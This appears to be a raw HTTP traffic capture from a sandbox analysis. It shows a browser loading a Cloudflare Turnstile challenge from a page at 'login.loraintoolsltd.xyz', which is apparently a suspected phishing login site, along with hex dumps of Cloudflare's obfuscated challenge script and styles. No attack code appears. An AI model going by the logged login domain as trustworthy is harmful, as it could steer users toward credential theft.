2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 71 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 7a 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 73 72 28 74 68 69 73 2c 63 29 7d 7d 76 61 72 20 66 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 75 72 28 61 2c 65 29 3b 76 61 72 20 74 3d 64 72 28 61 29 3b Data Ascii: eof t=="function")?t:qe(e)}function dr(e){var t=ze();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this,arguments);return sr(this,c)}}var fr=function(e){"use strict";ur(a,e);var t=dr(a);
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 6c 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 29 3b 74 2e 77 72 61 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 6d 28 22 43 61 6e 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 20 57 69 64 67 65 74 2c 20 45 6c 65 6d 65 6e 74 20 6e 6f 74 20 66 6f 75 6e 64 20 28 23 22 2e 63 6f 6e 63 61 74 28 Data Ascii: -cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((l=t.params.theme)!==null&&l!==void 0?l:t.theme,"/").concat(a);t.wrapper.parentNode\|\|m("Cannot initialize Widget, Element not found (#".concat(

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:20 UTC	808	OUT	GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/ HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://login.loraintoolsltd.xyz/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:21 UTC	1362	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 27032 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self' cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: cross-origin origin-agent-cluster: ?1 accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA referrer-policy: same-origin document-policy: js-profiling
2025-01-23 23:03:21 UTC	82	IN	Data Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 36 62 36 61 61 34 31 64 32 34 34 34 30 35 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: Server: cloudflareCF-RAY: 906b6aa41d244405-EWRalt-svc: h3=":443"; ma=86400
2025-01-23 23:03:21 UTC	1294	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 Data Ascii: ding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30 Data Ascii: troke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#0
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b Data Ascii: -dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 Data Ascii: 0}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-he
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 Data Ascii: stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de13
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 Data Ascii: y:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-comp
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 Data Ascii: {left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a Data Ascii: lor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:21 UTC	731	OUT	GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=906b6aa41d244405&lang=auto HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:22 UTC	331	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:22 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 118787 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 906b6aaabb2080dc-EWR alt-svc: h3=":443"; ma=86400
2025-01-23 23:03:22 UTC	1038	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 53 6d 51 51 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SSmQQ2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
2025-01-23 23:03:22 UTC	1369	IN	Data Raw: 73 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 Data Ascii: s","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","testing_only":"Testing%20only.","turnstile_footer_privacy":"Privacy","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this
2025-01-23 23:03:22 UTC	1369	IN	Data Raw: 2c 66 55 2c 66 59 2c 66 5a 2c 67 30 2c 67 37 2c 67 64 2c 67 65 2c 67 45 2c 67 62 2c 67 63 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 30 34 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 34 35 29 29 2f 32 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 37 37 32 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 35 39 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 30 34 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 35 31 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 30 36 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 32 30 Data Ascii: ,fU,fY,fZ,g0,g7,gd,ge,gE,gb,gc){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1504))/1+-parseInt(gI(745))/2(parseInt(gI(772))/3)+parseInt(gI(1059))/4(parseInt(gI(1004))/5)+parseInt(gI(1451))/6+parseInt(gI(406))/7+parseInt(gI(20
2025-01-23 23:03:22 UTC	1369	IN	Data Raw: 5b 67 4d 28 31 33 36 37 29 5d 3f 69 5b 67 4d 28 36 37 38 29 5d 28 27 68 2f 27 2c 65 4d 5b 67 4d 28 35 35 32 29 5d 5b 67 4d 28 31 33 36 37 29 5d 29 2b 27 2f 27 3a 27 27 2c 6d 3d 69 5b 67 4d 28 36 37 38 29 5d 28 69 5b 67 4d 28 32 32 31 29 5d 28 69 5b 67 4d 28 36 37 38 29 5d 28 67 4d 28 32 37 39 29 2b 6c 2b 67 4d 28 31 34 39 30 29 2c 31 29 2b 67 4d 28 39 39 39 29 2c 65 4d 5b 67 4d 28 35 35 32 29 5d 5b 67 4d 28 35 33 37 29 5d 29 2c 27 2f 27 29 2b 65 4d 5b 67 4d 28 35 35 32 29 5d 2e 63 48 2b 27 2f 27 2b 65 4d 5b 67 4d 28 35 35 32 29 5d 5b 67 4d 28 39 31 36 29 5d 2c 6e 3d 7b 7d 2c 6e 5b 67 4d 28 37 37 37 29 5d 3d 65 4d 5b 67 4d 28 35 35 32 29 5d 5b 67 4d 28 37 37 37 29 5d 2c 6e 5b 67 4d 28 31 31 38 39 29 5d 3d 65 4d 5b 67 4d 28 35 35 32 29 5d 5b 67 4d 28 31 31 Data Ascii: [gM(1367)]?i[gM(678)]('h/',eM[gM(552)][gM(1367)])+'/':'',m=i[gM(678)](i[gM(221)](i[gM(678)](gM(279)+l+gM(1490),1)+gM(999),eM[gM(552)][gM(537)]),'/')+eM[gM(552)].cH+'/'+eM[gM(552)][gM(916)],n={},n[gM(777)]=eM[gM(552)][gM(777)],n[gM(1189)]=eM[gM(552)][gM(11
2025-01-23 23:03:22 UTC	1369	IN	Data Raw: 28 31 35 32 35 29 5d 3d 67 2c 73 5b 67 50 28 31 35 34 30 29 5d 3d 68 2c 73 5b 67 50 28 39 32 30 29 5d 3d 69 2c 73 5b 67 50 28 38 36 37 29 5d 3d 6a 2c 76 3d 73 2c 65 4d 5b 67 50 28 31 35 30 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 52 29 7b 67 52 3d 67 50 2c 65 4d 5b 67 52 28 31 39 38 29 5d 28 76 2c 75 6e 64 65 66 69 6e 65 64 2c 42 5b 67 52 28 31 31 33 39 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 67 50 28 31 35 30 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 53 29 7b 67 53 3d 67 50 2c 65 4d 5b 67 53 28 31 39 33 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 67 50 28 33 36 35 29 5d 5b 67 50 28 38 37 30 29 5d 28 67 50 28 32 36 37 29 2c 66 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 42 3d 28 78 3d 7b 7d 2c 78 5b 67 50 28 31 31 33 39 29 5d 3d 67 50 28 39 30 Data Ascii: (1525)]=g,s[gP(1540)]=h,s[gP(920)]=i,s[gP(867)]=j,v=s,eM[gP(1505)](function(gR){gR=gP,eM[gR(198)](v,undefined,B[gR(1139)])},10),eM[gP(1505)](function(gS){gS=gP,eM[gS(193)]()},1e3),eM[gP(365)][gP(870)](gP(267),f));continue;case'3':B=(x={},x[gP(1139)]=gP(90
